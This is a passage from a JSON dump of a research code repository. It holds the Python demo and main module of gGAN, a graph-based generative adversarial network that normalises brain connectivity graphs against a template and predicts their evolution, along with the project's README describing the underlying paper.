= data.x, data.edge_index, data.edge_attr\r\n\r\n x1 = F.sigmoid(self.conv11(self.conv1(x, edge_index, edge_attr)))\r\n x1 = F.dropout(x1, training=self.training)\r\n\r\n x2 = F.sigmoid(self.conv22(self.conv2(x1, edge_index, edge_attr)))\r\n x2 = F.dropout(x2, training=self.training)\r\n\r\n embedded = x2.detach().cpu().clone().numpy()\r\n\r\n return embedded\r\n\r\n def embed(Casted_source):\r\n embedded_data = np.zeros((1, 35), dtype=float)\r\n i = 0\r\n for data_A in Casted_source: ## take a subject from source and target data\r\n embedded = generator(data_A) # 35 x35\r\n\r\n if i == 0:\r\n embedded = np.transpose(embedded)\r\n embedded_data = embedded\r\n else:\r\n embedded = np.transpose(embedded)\r\n embedded_data = np.append(embedded_data, embedded, axis=0)\r\n i = i + 1\r\n return embedded_data\r\n\r\n def test_gGAN(data_next, embedded_train_data, embedded_test_data, embedded_CBT):\r\n def x_to_x(x_train, x_test, nbr_of_trn, nbr_of_tst):\r\n result = np.empty((nbr_of_tst, nbr_of_trn), dtype=float)\r\n for i in range(nbr_of_tst):\r\n x_t = np.transpose(x_test[i])\r\n for j in range(nbr_of_trn):\r\n result[i, j] = np.matmul(x_train[j], x_t)\r\n return result\r\n\r\n def check(neighbors, i, j):\r\n for val in neighbors[i, :]:\r\n if val == j:\r\n return 1\r\n return 0\r\n\r\n def k_neighbors(x_to_x, k_num, nbr_of_trn, nbr_of_tst):\r\n 
neighbors = np.zeros((nbr_of_tst, k_num), dtype=int)\r\n used = np.zeros((nbr_of_tst, nbr_of_trn), dtype=int)\r\n current = 0\r\n for i in range(nbr_of_tst):\r\n for k in range(k_num):\r\n for j in range(nbr_of_trn):\r\n if abs(x_to_x[i, j]) > current:\r\n if check(neighbors, i, j) == 0:\r\n neighbors[i, k] = j\r\n current = abs(x_to_x[i, neighbors[i, k]])\r\n current = 0\r\n\r\n return neighbors\r\n\r\n def subtract_cbt(x, cbt, length):\r\n for i in range(length):\r\n x[i] = abs(x[i] - cbt[0])\r\n\r\n return x\r\n\r\n def predict_samples(k_neighbors, t1, nbr_of_tst):\r\n average = np.zeros((nbr_of_tst, 595), dtype=float)\r\n for i in range(nbr_of_tst):\r\n for j in range(len(k_neighbors[0])):\r\n average[i] = average[i] + t1[k_neighbors[i,j],:]\r\n\r\n average[i] = average[i] / len(k_neighbors[0])\r\n\r\n return average\r\n\r\n residual_of_tr_embeddings = subtract_cbt(embedded_train_data, embedded_CBT, len(embedded_train_data))\r\n residual_of_ts_embeddings = subtract_cbt(embedded_test_data, embedded_CBT, len(embedded_test_data))\r\n\r\n dot_of_residuals = x_to_x(residual_of_tr_embeddings, residual_of_ts_embeddings, len(train), len(test))\r\n for k in range(2, 11):\r\n k_neighbors_ = k_neighbors(dot_of_residuals, k, len(train), len(test))\r\n\r\n if k == 2:\r\n prediction = predict_samples(k_neighbors_, data_next, len(embedded_test_data))\r\n prediction = np.reshape(prediction, (1, len(embedded_test_data), nbr_of_feat))\r\n else:\r\n new_predict = predict_samples(k_neighbors_, data_next, len(embedded_test_data))\r\n new_predict = np.reshape(new_predict, (1, len(embedded_test_data), nbr_of_feat))\r\n prediction = np.append(prediction, new_predict, axis=0)\r\n\r\n return prediction\r\n\r\n nbr_of_sub = int(input('Please select the number of subjects: '))\r\n if nbr_of_sub < 5:\r\n print(\"You can not give less than 5 to the number of subjects. 
\")\r\n nbr_of_sub = int(input('Please select the number of subjects: '))\r\n nbr_of_regions = int(input('Please select the number of regions: '))\r\n nbr_of_epochs = int(input('Please select the number of epochs: '))\r\n nbr_of_folds = int(input('Please select the number of folds: '))\r\n hyper_param1 = 100\r\n nbr_of_feat = int((np.square(nbr_of_regions) - nbr_of_regions) / 2)\r\n nbr_of_sub_for_cbt = int(nbr_of_sub // 5) # CBT will be generated by %20 of the number of subjects.\r\n print(nbr_of_sub_for_cbt)\r\n\r\n data = np.random.normal(0.6, 0.3, (nbr_of_sub, nbr_of_regions, nbr_of_regions))\r\n independent_data = np.random.normal(0.6, 0.3, (nbr_of_sub_for_cbt, nbr_of_regions, nbr_of_regions))\r\n data_next = np.random.normal(0.4, 0.3, (nbr_of_sub, nbr_of_regions, nbr_of_regions))\r\n CBT = netNorm(independent_data, nbr_of_sub_for_cbt, nbr_of_regions)\r\n gGAN(data, nbr_of_regions, nbr_of_epochs, nbr_of_folds, hyper_param1, CBT)\r\n\r\n # embed train and test subjects\r\n kfold = KFold(n_splits=nbr_of_folds, shuffle=True, random_state=manualSeed)\r\n\r\n source_data = torch.from_numpy(data) # convert numpy array to torch tensor\r\n source_data = source_data.type(torch.FloatTensor)\r\n\r\n target_data = np.reshape(CBT, (1, nbr_of_regions, nbr_of_regions, 1))\r\n target_data = torch.from_numpy(target_data) # convert numpy array to torch tensor\r\n target_data = target_data.type(torch.FloatTensor)\r\n\r\n i = 1\r\n for train, test in kfold.split(source_data):\r\n adversarial_loss = torch.nn.BCELoss()\r\n l1_loss = torch.nn.L1Loss()\r\n trained_model_gen = torch.load('./weight_' + str(i) + 'generator_.model')\r\n generator = Generator()\r\n generator.load_state_dict(trained_model_gen)\r\n\r\n train_data = source_data[train]\r\n test_data = source_data[test]\r\n\r\n generator.to(device)\r\n adversarial_loss.to(device)\r\n l1_loss.to(device)\r\n\r\n X_train_casted_source = [d.to(device) for d in cast_data(train_data, 0)]\r\n X_test_casted_source = [d.to(device) for d in cast_data(test_data, 0)]\r\n data_B = [d.to(device) for d in cast_data(target_data, 0)]\r\n\r\n embedded_train_data = embed(X_train_casted_source)\r\n embedded_test_data = embed(X_test_casted_source)\r\n embedded_CBT = embed(data_B)\r\n\r\n if i == 1:\r\n data_next = linear_features(data_next)\r\n predicted_flat = test_gGAN(data_next, embedded_train_data, embedded_test_data, embedded_CBT)\r\n\r\n plot_MAE(predicted_flat, data_next, test, i)\r\n i = i + 1\r\n\r\n predicted = make_sym_matrix(nbr_of_regions, predicted_flat)\r\n plot_predictions(predicted, i - 1)\r\n\r\ndemo()\r\n\r\n"
},
{
"alpha_fraction": 0.5558170676231384,
"alphanum_fraction": 0.5693501234054565,
"avg_line_length": 40.883026123046875,
"blob_id": "231ad0a3866bdded67d09c25f774cd36df398b81",
"content_id": "80390cd6e8a6a9135f8e188a901f7cfec87b4200",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18697,
"license_type": "no_license",
"max_line_length": 139,
"num_lines": 436,
"path": "/gGAN.py",
"repo_name": "zeynepgurler/gGAN",
"src_encoding": "UTF-8",
"text": "\"\"\"Main function of gGAN for the paper: Foreseeing Brain Graph Evolution Over Time\r\nUsing Deep Adversarial Network Normalizer\r\n Details can be found in: (https://arxiv.org/abs/2009.11166)\r\n (1) the original paper .\r\n ---------------------------------------------------------------------\r\n This file contains the implementation of two key steps of our gGAN framework:\r\n netNorm(v, nbr_of_sub, nbr_of_regions)\r\n Inputs:\r\n v: (n × t x t) matrix stacking the source graphs of all subjects\r\n n the total number of subjects\r\n t number of regions\r\n Output:\r\n CBT: (t x t) matrix representing the connectional brain template\r\n\r\n gGAN(sourceGraph, nbr_of_regions, nbr_of_folds, nbr_of_epochs, hyper_param1, CBT)\r\n Inputs:\r\n sourceGraph: (n × t x t) matrix stacking the source graphs of all subjects\r\n n the total number of subjects\r\n t number of regions\r\n CBT: (t x t) matrix stacking the connectional brain template generated by netNorm\r\n\r\n Output:\r\n translatedGraph: (t x t) matrix stacking the graph translated into CBT\r\n\r\n This code has been slightly modified to be compatible across all PyTorch versions.\r\n\r\n (2) Dependencies: please install the following libraries:\r\n - matplotlib\r\n - numpy\r\n - scikitlearn\r\n - pytorch\r\n - pytorch-geometric\r\n - pytorch-scatter\r\n - pytorch-sparse\r\n - scipy\r\n\r\n ---------------------------------------------------------------------\r\n Copyright 2020 ().\r\n Please cite the above paper if you use this code.\r\n All rights reserved.\r\n \"\"\"\r\n\r\n\r\n# If you are using Google Colab please uncomment the three following lines.\r\n# !pip install torch_geometric\r\n# !pip install torch-sparse==latest+cu101 -f https://pytorch-geometric.com/whl/torch-1.4.0.html\r\n# !pip install torch-scatter==latest+cu101 -f https://pytorch-geometric.com/whl/torch-1.4.0.html\r\n\r\n\r\nimport argparse\r\nimport os\r\nimport pdb\r\nimport numpy as np\r\nimport math\r\nimport itertools\r\nimport torch\r\nfrom torch.nn import Sequential, Linear, ReLU, Sigmoid, Tanh, Dropout\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn import preprocessing\r\nfrom torch_geometric.data import Data\r\nfrom torch.autograd import Variable\r\nimport torch.nn.functional as F\r\nimport torch.nn as nn\r\nfrom torch_geometric.nn import NNConv\r\nfrom torch_geometric.nn import BatchNorm, EdgePooling, TopKPooling, global_add_pool\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.cluster import KMeans\r\nimport matplotlib.pyplot as plt\r\nimport scipy.io\r\nimport scipy.stats as stats\r\nimport random\r\n\r\nimport seaborn as sns\r\n\r\ntorch.cuda.empty_cache()\r\ntorch.cuda.empty_cache()\r\n\r\n# random seed\r\nmanualSeed = 1\r\n\r\nnp.random.seed(manualSeed)\r\nrandom.seed(manualSeed)\r\ntorch.manual_seed(manualSeed)\r\n\r\nif torch.cuda.is_available():\r\n device = torch.device('cuda')\r\n print('running on GPU')\r\n # if you are using GPU\r\n torch.cuda.manual_seed(manualSeed)\r\n torch.cuda.manual_seed_all(manualSeed)\r\n\r\n torch.backends.cudnn.enabled = False\r\n torch.backends.cudnn.benchmark = False\r\n torch.backends.cudnn.deterministic = True\r\n\r\nelse:\r\n device = torch.device(\"cpu\")\r\n print('running on CPU')\r\n\r\ndef netNorm(v, nbr_of_sub, nbr_of_regions):\r\n nbr_of_feat = int((np.square(nbr_of_regions) - nbr_of_regions) / 2)\r\n\r\n def upper_triangular():\r\n All_subj = np.zeros((nbr_of_sub, nbr_of_feat))\r\n for j in range(nbr_of_sub):\r\n subj_x = v[j, :, :]\r\n subj_x = np.reshape(subj_x, 
(nbr_of_regions, nbr_of_regions))\r\n subj_x = subj_x[np.triu_indices(nbr_of_regions, k=1)]\r\n subj_x = np.reshape(subj_x, (1, nbr_of_feat))\r\n All_subj[j, :] = subj_x\r\n\r\n return All_subj\r\n\r\n def distances_inter(All_subj):\r\n theta = 0\r\n distance_vector = np.zeros(1)\r\n distance_vector_final = np.zeros(1)\r\n x = All_subj\r\n for i in range(nbr_of_feat):\r\n ROI_i = x[:, i]\r\n for j in range(nbr_of_sub):\r\n subj_j = ROI_i[j:j+1]\r\n\r\n distance_euclidienne_sub_j_sub_k = 0\r\n for k in range(nbr_of_sub):\r\n if k != j:\r\n subj_k = ROI_i[k:k+1]\r\n\r\n distance_euclidienne_sub_j_sub_k = distance_euclidienne_sub_j_sub_k + np.square(subj_k - subj_j)\r\n theta +=1\r\n if j == 0:\r\n distance_vector = np.sqrt(distance_euclidienne_sub_j_sub_k)\r\n else:\r\n distance_vector = np.concatenate((distance_vector, np.sqrt(distance_euclidienne_sub_j_sub_k)), axis=0)\r\n\r\n distance_vector = np.reshape(distance_vector, (nbr_of_sub, 1))\r\n if i == 0:\r\n distance_vector_final = distance_vector\r\n else:\r\n distance_vector_final = np.concatenate((distance_vector_final, distance_vector), axis=1)\r\n\r\n print(theta)\r\n return distance_vector_final\r\n\r\n\r\n def minimum_distances(distance_vector_final):\r\n x = distance_vector_final\r\n\r\n for i in range(nbr_of_feat):\r\n minimum_sub = x[0, i:i+1]\r\n minimum_sub = float(minimum_sub)\r\n for k in range(1, nbr_of_sub):\r\n local_sub = x[k:k+1, i:i+1]\r\n local_sub = float(local_sub)\r\n if local_sub < minimum_sub:\r\n general_minimum = k\r\n general_minimum = np.array(general_minimum)\r\n minimum_sub = local_sub\r\n if i == 0:\r\n final_general_minimum = np.array(general_minimum)\r\n else:\r\n final_general_minimum = np.vstack((final_general_minimum, general_minimum))\r\n\r\n final_general_minimum = np.transpose(final_general_minimum)\r\n\r\n return final_general_minimum\r\n\r\n def new_tensor(final_general_minimum, All_subj):\r\n y = All_subj\r\n x = final_general_minimum\r\n for i in range(nbr_of_feat):\r\n optimal_subj = x[:, i:i+1]\r\n optimal_subj = np.reshape(optimal_subj, (1))\r\n optimal_subj = int(optimal_subj)\r\n if i == 0:\r\n final_new_tensor = y[optimal_subj: optimal_subj+1, i:i+1]\r\n else:\r\n final_new_tensor = np.concatenate((final_new_tensor, y[optimal_subj: optimal_subj+1, i:i+1]), axis=1)\r\n\r\n return final_new_tensor\r\n\r\n def make_sym_matrix(nbr_of_regions, feature_vector):\r\n my_matrix = np.zeros([nbr_of_regions, nbr_of_regions], dtype=np.double)\r\n\r\n my_matrix[np.triu_indices(nbr_of_regions, k=1)] = feature_vector\r\n my_matrix = my_matrix + my_matrix.T\r\n my_matrix[np.diag_indices(nbr_of_regions)] = 0\r\n\r\n return my_matrix\r\n\r\n def re_make_tensor(final_new_tensor, nbr_of_regions):\r\n x = final_new_tensor\r\n #x = np.reshape(x, (nbr_of_views, nbr_of_feat))\r\n\r\n x = make_sym_matrix(nbr_of_regions, x)\r\n x = np.reshape(x, (1, nbr_of_regions, nbr_of_regions))\r\n\r\n return x\r\n\r\n Upp_trig = upper_triangular()\r\n Dis_int = distances_inter(Upp_trig)\r\n Min_dis = minimum_distances(Dis_int)\r\n New_ten = new_tensor(Min_dis, Upp_trig)\r\n Re_ten = re_make_tensor(New_ten, nbr_of_regions)\r\n Re_ten = np.reshape(Re_ten, (nbr_of_regions, nbr_of_regions))\r\n np.fill_diagonal(Re_ten, 0)\r\n network = np.array(Re_ten)\r\n return network\r\n\r\ndef gGAN(data, nbr_of_regions, nbr_of_epochs, nbr_of_folds, hyper_param1, CBT):\r\n def cast_data(array_of_tensors, version):\r\n version1 = torch.tensor(version, dtype=torch.int)\r\n\r\n N_ROI = array_of_tensors[0].shape[0]\r\n CHANNELS = 1\r\n dataset = 
[]\r\n edge_index = torch.zeros(2, N_ROI * N_ROI)\r\n edge_attr = torch.zeros(N_ROI * N_ROI, CHANNELS)\r\n x = torch.zeros((N_ROI, N_ROI)) # 35 x 35\r\n y = torch.zeros((1,))\r\n\r\n counter = 0\r\n for i in range(N_ROI):\r\n for j in range(N_ROI):\r\n edge_index[:, counter] = torch.tensor([i, j])\r\n counter += 1\r\n for mat in array_of_tensors: #1,35,35,4\r\n\r\n if version1 == 0:\r\n edge_attr = mat.view((nbr_of_regions*nbr_of_regions), 1)\r\n x = mat.view(nbr_of_regions, nbr_of_regions)\r\n edge_index = torch.tensor(edge_index, dtype=torch.long)\r\n edge_attr = torch.tensor(edge_attr, dtype=torch.float)\r\n x = torch.tensor(x, dtype=torch.float)\r\n data = Data(x=x, edge_index=edge_index, edge_attr=edge_attr)\r\n dataset.append(data)\r\n\r\n elif version1 == 1:\r\n edge_attr = torch.randn(N_ROI * N_ROI, CHANNELS)\r\n x = torch.randn(N_ROI, N_ROI) # 35 x 35\r\n edge_index = torch.tensor(edge_index, dtype=torch.long)\r\n edge_attr = torch.tensor(edge_attr, dtype=torch.float)\r\n x = torch.tensor(x, dtype=torch.float)\r\n data = Data(x=x, edge_index=edge_index, edge_attr=edge_attr)\r\n dataset.append(data)\r\n\r\n return dataset\r\n\r\n # ------------------------------------------------------------\r\n\r\n def plotting_loss(losses_generator, losses_discriminator, epoch):\r\n plt.figure(1)\r\n plt.plot(epoch, losses_generator, 'r-')\r\n plt.plot(epoch, losses_discriminator, 'b-')\r\n plt.legend(['G Loss', 'D Loss'])\r\n plt.xlabel('Epoch')\r\n plt.ylabel('Loss')\r\n plt.savefig('./plot/loss' + str(epoch) + '.png')\r\n\r\n # -------------------------------------------------------------\r\n\r\n class Generator(nn.Module):\r\n def __init__(self):\r\n super(Generator, self).__init__()\r\n\r\n nn = Sequential(Linear(1, (nbr_of_regions*nbr_of_regions)), ReLU())\r\n self.conv1 = NNConv(nbr_of_regions, nbr_of_regions, nn, aggr='mean', root_weight=True, bias=True)\r\n self.conv11 = BatchNorm(nbr_of_regions, eps=1e-03, momentum=0.1, affine=True, track_running_stats=True)\r\n\r\n nn = Sequential(Linear(1, nbr_of_regions), ReLU())\r\n self.conv2 = NNConv(nbr_of_regions, 1, nn, aggr='mean', root_weight=True, bias=True)\r\n self.conv22 = BatchNorm(1, eps=1e-03, momentum=0.1, affine=True, track_running_stats=True)\r\n\r\n nn = Sequential(Linear(1, nbr_of_regions), ReLU())\r\n self.conv3 = NNConv(1, nbr_of_regions, nn, aggr='mean', root_weight=True, bias=True)\r\n self.conv33 = BatchNorm(nbr_of_regions, eps=1e-03, momentum=0.1, affine=True, track_running_stats=True)\r\n\r\n def forward(self, data):\r\n x, edge_index, edge_attr = data.x, data.edge_index, data.edge_attr\r\n\r\n x1 = F.sigmoid(self.conv11(self.conv1(x, edge_index, edge_attr)))\r\n x1 = F.dropout(x1, training=self.training)\r\n\r\n x2 = F.sigmoid(self.conv22(self.conv2(x1, edge_index, edge_attr)))\r\n x2 = F.dropout(x2, training=self.training)\r\n\r\n x3 = torch.cat([F.sigmoid(self.conv33(self.conv3(x2, edge_index, edge_attr))), x1], dim=1)\r\n x4 = x3[:, 0:nbr_of_regions]\r\n x5 = x3[:, nbr_of_regions:2*nbr_of_regions]\r\n\r\n x6 = (x4 + x5) / 2\r\n return x6\r\n\r\n class Discriminator1(torch.nn.Module):\r\n def __init__(self):\r\n super(Discriminator1, self).__init__()\r\n nn = Sequential(Linear(2, (nbr_of_regions*nbr_of_regions)), ReLU())\r\n self.conv1 = NNConv(nbr_of_regions, nbr_of_regions, nn, aggr='mean', root_weight=True, bias=True)\r\n self.conv11 = BatchNorm(nbr_of_regions, eps=1e-03, momentum=0.1, affine=True, track_running_stats=True)\r\n\r\n nn = Sequential(Linear(2, nbr_of_regions), ReLU())\r\n self.conv2 = 
NNConv(nbr_of_regions, 1, nn, aggr='mean', root_weight=True, bias=True)\r\n self.conv22 = BatchNorm(1, eps=1e-03, momentum=0.1, affine=True, track_running_stats=True)\r\n\r\n\r\n def forward(self, data, data_to_translate):\r\n x, edge_index, edge_attr = data.x, data.edge_index, data.edge_attr\r\n edge_attr_data_to_translate = data_to_translate.edge_attr\r\n\r\n edge_attr_data_to_translate_reshaped = edge_attr_data_to_translate.view(nbr_of_regions*nbr_of_regions, 1)\r\n\r\n gen_input = torch.cat((edge_attr, edge_attr_data_to_translate_reshaped), -1)\r\n x = F.relu(self.conv11(self.conv1(x, edge_index, gen_input)))\r\n x = F.dropout(x, training=self.training)\r\n x = F.relu(self.conv22(self.conv2(x, edge_index, gen_input)))\r\n\r\n return F.sigmoid(x)\r\n\r\n # ----------------------------------------\r\n # Training\r\n # ----------------------------------------\r\n\r\n n_fold_counter = 1\r\n plot_loss_g = np.empty((nbr_of_epochs), dtype=float)\r\n plot_loss_d = np.empty((nbr_of_epochs), dtype=float)\r\n\r\n kfold = KFold(n_splits=nbr_of_folds, shuffle=True, random_state=manualSeed)\r\n\r\n source_data = torch.from_numpy(data) # convert numpy array to torch tensor\r\n source_data = source_data.type(torch.FloatTensor)\r\n\r\n target_data = np.reshape(CBT, (1, nbr_of_regions, nbr_of_regions, 1))\r\n target_data = torch.from_numpy(target_data) # convert numpy array to torch tensor\r\n target_data = target_data.type(torch.FloatTensor)\r\n\r\n for train, test in kfold.split(source_data):\r\n # Loss function\r\n adversarial_loss = torch.nn.BCELoss()\r\n l1_loss = torch.nn.L1Loss()\r\n # Initialize generator and discriminator\r\n generator = Generator()\r\n discriminator1 = Discriminator1()\r\n\r\n generator.to(device)\r\n discriminator1.to(device)\r\n adversarial_loss.to(device)\r\n l1_loss.to(device)\r\n\r\n # Optimizers\r\n optimizer_G = torch.optim.AdamW(generator.parameters(), lr=0.005, betas=(0.5, 0.999))\r\n optimizer_D = torch.optim.AdamW(discriminator1.parameters(), lr=0.01, betas=(0.5, 0.999))\r\n\r\n # ------------------------------- select source data and target data -------------------------------\r\n\r\n train_source, test_source = source_data[train], source_data[test] ## from a specific source view\r\n\r\n # 1: everything random; 0: everything is the matrix in question\r\n\r\n train_casted_source = [d.to(device) for d in cast_data(train_source, 0)]\r\n train_casted_target = [d.to(device) for d in cast_data(target_data, 0)]\r\n\r\n for epoch in range(nbr_of_epochs):\r\n # Train Generator\r\n with torch.autograd.set_detect_anomaly(True):\r\n\r\n losses_generator = []\r\n losses_discriminator = []\r\n\r\n for data_A in train_casted_source:\r\n generators_output_ = generator(data_A) # 35 x35\r\n generators_output = generators_output_.view(1, nbr_of_regions, nbr_of_regions, 1).type(torch.FloatTensor)\r\n\r\n generators_output_casted = [d.to(device) for d in cast_data(generators_output, 0)]\r\n for (data_discriminator) in generators_output_casted:\r\n discriminator_output_of_gen = discriminator1(data_discriminator, data_A).to(device)\r\n\r\n g_loss_adversarial = adversarial_loss(discriminator_output_of_gen, torch.ones_like(discriminator_output_of_gen))\r\n\r\n g_loss_pix2pix = l1_loss(generators_output_, train_casted_target[0].edge_attr.view(nbr_of_regions, nbr_of_regions))\r\n\r\n g_loss = g_loss_adversarial + (hyper_param1 * g_loss_pix2pix)\r\n losses_generator.append(g_loss)\r\n\r\n discriminator_output_for_real_loss = discriminator1(data_A, train_casted_target[0])\r\n\r\n real_loss = 
adversarial_loss(discriminator_output_for_real_loss,\r\n (torch.ones_like(discriminator_output_for_real_loss, requires_grad=False)))\r\n fake_loss = adversarial_loss(discriminator_output_of_gen.detach(), torch.zeros_like(discriminator_output_of_gen))\r\n\r\n d_loss = (real_loss + fake_loss) / 2\r\n losses_discriminator.append(d_loss)\r\n\r\n optimizer_G.zero_grad()\r\n losses_generator = torch.mean(torch.stack(losses_generator))\r\n losses_generator.backward(retain_graph=True)\r\n optimizer_G.step()\r\n\r\n optimizer_D.zero_grad()\r\n losses_discriminator = torch.mean(torch.stack(losses_discriminator))\r\n\r\n losses_discriminator.backward(retain_graph=True)\r\n optimizer_D.step()\r\n\r\n print(\r\n \"[Epoch %d/%d] [D loss: %f] [G loss: %f]\"\r\n % (epoch, nbr_of_epochs, losses_discriminator, losses_generator))\r\n\r\n plot_loss_g[epoch] = losses_generator.detach().cpu().clone().numpy()\r\n plot_loss_d[epoch] = losses_discriminator.detach().cpu().clone().numpy()\r\n\r\n torch.save(generator.state_dict(), \"./weight_\" + str(n_fold_counter) + \"generator\" + \"_\" + \".model\")\r\n torch.save(discriminator1.state_dict(), \"./weight_\" + str(n_fold_counter) + \"dicriminator\" + \"_\" + \".model\")\r\n\r\n interval = range(0, nbr_of_epochs)\r\n plotting_loss(plot_loss_g, plot_loss_d, interval)\r\n n_fold_counter += 1\r\n torch.cuda.empty_cache()\r\n torch.cuda.empty_cache()\r\n\r\n\"\"\"\r\nnbr_of_sub = int(input('Please select the number of subjects: '))\r\nif nbr_of_sub < 5:\r\n print(\"You can not give less than 5 to the number of subjects. \")\r\n nbr_of_sub = int(input('Please select the number of subjects: '))\r\nnbr_of_regions = int(input('Please select the number of regions: '))\r\nnbr_of_epochs = int(input('Please select the number of epochs: '))\r\nnbr_of_folds = int(input('Please select the number of folds: '))\r\nhyper_param1 = 100\r\nnbr_of_feat = int((np.square(nbr_of_regions) - nbr_of_regions) / 2)\r\nnbr_of_sub_for_cbt = int(nbr_of_sub // 5) # CBT will be generated by %20 of the number of subjects.\r\n\r\ndata = np.random.normal(0.6, 0.3, (nbr_of_sub, nbr_of_regions, nbr_of_regions))\r\nindependent_data = np.random.normal(0.6, 0.3, (nbr_of_sub_for_cbt, nbr_of_regions, nbr_of_regions))\r\nCBT = netNorm(independent_data, nbr_of_sub_for_cbt, nbr_of_regions)\r\ngGAN(data, nbr_of_regions, nbr_of_epochs, nbr_of_folds, hyper_param1, CBT)\r\n\"\"\""
},
{
"alpha_fraction": 0.7752423286437988,
"alphanum_fraction": 0.7847874760627747,
"avg_line_length": 59.900001525878906,
"blob_id": "cfcd0bbef4c821b1ac8f3e82036dc83517ee252e",
"content_id": "378b172fcbcd35cf8751b564525773baa6450378",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6714,
"license_type": "no_license",
"max_line_length": 782,
"num_lines": 110,
"path": "/README.md",
"repo_name": "zeynepgurler/gGAN",
"src_encoding": "UTF-8",
"text": "# gGAN-PY (graph-based Generative Adversarial Network for normalizing brain graphs with respect to a fixed template) in Python\ngGAN-PY (graph-based Generative Adversarial Network) framework for normalizing brain graphs with respect to a fixed template, coded up in Python\nby Zeynep Gürler and Ahmed Nebli. Please contact [email protected] for inquiries. Thanks.\n \n> **Foreseeing Brain Graph Evolution Over Time\nUsing Deep Adversarial Network Normalizer**\n> [Zeynep Gürler](https://github.com/zeynepgurler)<sup>1</sup>, [Ahmed Nebli](https://github.com/ahmednebli)<sup>1,2</sup>, [Islem Rekik](https://basira-lab.com/)<sup>1</sup>\n> <sup>1</sup>BASIRA Lab, Faculty of Computer and Informatics, Istanbul Technical University, Istanbul, Turkey\n> <sup>2</sup>National School for Computer Science (ENSI), Mannouba, Tunisia\n>\n> **Abstract:** *Foreseeing the brain \nevolution as a complex highly interconnected system, widely modeled as a graph, \nis crucial for mapping dynamic interactions between different anatomical regions \nof interest (ROIs) in health and disease. Interestingly, brain graph evolution \nmodels remain almost absent in the literature. Here we design an adversarial brain \nnetwork normalizer for representing each brain network as a transformation of a \nfixed centered population-driven connectional template. Such graph normalization \nwith respect to a fixed reference paves the way for reliably identifying the most \nsimilar training samples (i.e., brain graphs) to the testing sample at baseline \ntimepoint. The testing evolution trajectory will be then spanned by the selected \ntraining graphs and their corresponding evolution trajectories. We base our prediction\n framework on geometric deep learning which naturally operates on graphs and nicely preserves \n their topological properties. Specifically, we propose the first graph-based \n Generative Adversarial Network (gGAN) that not only learns how to normalize brain \n graphs with respect to a fixed connectional brain template (CBT) (i.e., a brain \n template that selectively captures the most common features across a brain population)\n but also learns a highorder representation of the brain graphs also called embeddings. We use these embeddings to compute the similarity between training and testing \n subjects which allows us to pick the closest training subjects at baseline timepoint to predict the evolution of the testing brain graph over time. A series of benchmarks against several comparison methods showed that our proposed method achieved the \nlowest brain disease evolution prediction error using a single baseline timepoint.\n\n \n# Detailed proposed framework pipeline\nThis work has been published in the Journal of workshop PRIME at MICCAI, 2020. Our framework is a brain graph evolution trajectory prediction framework based on a gGAN architecture comprising a normalizer network with respect to a fixed connectional brain template (CBT). Our learning-based framework comprises four key steps. (1) Learning to normalize brain graphs with respect to the CBT, (2) Embedding the training, testing graphs and the CBT, (3) Brain graph evolution prediction using top k-closest neighbor selection. Experimental results against comparison methods demonstrate that our framework can achieve the best results in terms of average mean absolute error (MAE). We evaluated our proposed framework from OASIS-2 preprocessed dataset (https://www.oasis-brains.org/). 
\n\nMore details can be found at: (link to the paper) and our research paper video on the BASIRA Lab YouTube channel (link). \n\n\n\n\n# Libraries to preinstall in Python\n* [Python 3.8](https://www.python.org/)\n* [PyTorch 1.4.0](http://pytorch.org/)\n* [Torch-geometric](https://github.com/rusty1s/pytorch_geometric)\n* [Torch-sparse](https://github.com/rusty1s/pytorch_sparse)\n* [Torch-scatter](https://github.com/rusty1s/pytorch_scatter)\n* [Scikit-learn 0.23.0+](https://scikit-learn.org/stable/)\n* [Matplotlib 3.1.3+](https://matplotlib.org/)\n* [Numpy 1.18.1+](https://numpy.org/)\n\n# Demo\n\ngGAN is coded in Python 3.8 on Windows 10. GPU is not needed to run the code.\nThis code has been slightly modified to be compatible across all PyTorch versions.\nIn this repo, we release the gGAN source code trained and tested on a simulated data as shown below:\n\n**Data preparation**\n\nWe simulated random graph dataset drawn from two Gaussian distributions using the function np.random.normal. \nNumber of subjects, number of regions, number of epochs and number of folds are manually \ninputted by the user when starting the demo.\n\nTo train and evaluate gGAN code on other datasets, you need to provide:\n\n• A tensor of size (n × m × m) stacking the symmetric matrices of the training subjects.\n n denotes the total number of subjects and m denotes the number of regions.<br/>\n\nThe demo outputs are:\n\n• A matrix of size (t × l × (m × m)) stacking the predicted features of the testing subjects.\nt denotes the total number of testing subjects, l denotes the number of varying k numbers.\n\n**Train and test gGAN**\n\nTo evaluate our framework, we used leave-one-out cross validation strategy.\n\nTo try our code, you can use: demo.py\nFor how to install and run our framework, go to LINKK\n\n# Python Code\nTo run gGAN, generate a fixed connectional brain template. Use netNorm: https://github.com/basiralab/netNorm-PY\n\n# Example Results\nIf you set the number of epochs as 500, number of subjects as 90 and number of regions as 35, you will approximately get the following outputs when running the demo with default parameter setting:\n\n\n\n# YouTube videos to install and run the code and understand how gGAN works\n\nTo install and run our prediction framework, check the following YouTube video:\nhttps://youtu.be/2zKle7GzrIM\n\nTo learn about how our architecture works, check the following YouTube video:\nhttps://youtu.be/5vpQIFzf2Go\n\n# Related References\nFast Representation Learning with Pytorch-geometric: Fey, Matthias, Lenssen, Jan E., 2019, ICLR Workshop on Representation Learning on Graphs and Manifolds\n\nNetwork Normalization for Integrating Multi-view Networks (netNorm): Dhifallah, S., Rekik, I., 2020, Estimation of connectional brain templates using selective multi-view network normalization\n\n# Please Cite the Following paper when using gGAN:\n\n@article{gurler2020, title={ Foreseeing Brain Graph Evolution Over Time\nUsing Deep Adversarial Network Normalizer}, <br/>\nauthor={Gurler Zeynep, Nebli Ahmed, Rekik Islem}, <br/>\njournal={Predictive Intelligence in Medicine International Society and Conference Series on Medical Image Computing and Computer-Assisted Intervention},\nvolume={}, <br/>\npages={}, <br/>\nyear={2020}, <br/>\npublisher={Springer} <br/>\n}<br/>\n\n\n\n\n\n\n"
}
] | 3 |
rafaelbarretorb/my_astar_pub
|
https://github.com/rafaelbarretorb/my_astar_pub
|
3f0d4399c489b8b30a3bc9946e1459172c1025b4
|
54cdeae9f1d4c148f3bdc407c24a0f6aab485c9c
|
d8cc2db16272f6024b125934a99b8bcfea8ca34c
|
